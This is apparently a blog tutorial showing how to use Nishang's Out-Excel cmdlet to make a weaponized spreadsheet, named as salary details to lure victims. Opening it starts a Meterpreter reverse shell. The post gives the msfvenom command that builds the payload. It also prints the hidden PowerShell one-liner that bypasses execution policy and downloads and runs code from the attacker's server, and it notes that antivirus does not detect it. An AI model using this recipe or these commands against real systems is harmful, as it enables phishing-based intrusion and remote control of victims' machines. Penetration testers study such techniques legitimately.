Nishang – Out-Excel

Nishang has a set of client side attack scripts designed to weaponize office documents. Here is quick demo using Nishang’s PowerShell Cmdlet, Out-Excel, to generate an Excel file that contains code to download and execute a meterpreter payload. I’m using Kali to generate and serve the payload, and my Windows machine will be playing the role of attacker and victim for ease of demo.

  1. On Kali, generate the Meterpreter payload, start a webserver, and copy the payload to the web root: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.201 -f psh-reflection > ps_payload32.ps1

 

  1. On Kali, start a listener:

out-excel_handler

  1. On your Windows (attacker) machine, import the Nishang module and use the Get-Excel Cmdlet to create a weaponized Excel spreadsheet. If you don’t have Nishang, you can get it here: https://github.com/samratashok/nishang.

out-excel_import-module

Disregard the error message when importing. The Out-Excel Cmdlet generates an Excel file (Salary_Details.xls) and inserts VB script to have it connect to the server that is hosting the payload, specified in the PayloadURL parameter.

out-excel_files

Now, I’ll play the part of victim and double-click the Salary_Details.xls spreadsheet. The VB code in the spreadsheet will start powershell, download the payload, and execute it. And then I get my meterpreter:

out-excel_meterpreter

As of now, nothing gets detected as malware. The payload is running in memory and the Excel file is benign. The payload of the Excel file is just this simple script:

“powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.0.201/ps_payload32.ps1’));”

As you can see, it invokes powershell, provides options that hides the window and attempts to circumvent any execution policies, and then passes a command that downloads the payload from the server. The IEX command is an alias for the Cmdlet Invoke-Expression, which executes the downloaded string, which in this case is the powershell meterpreter.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *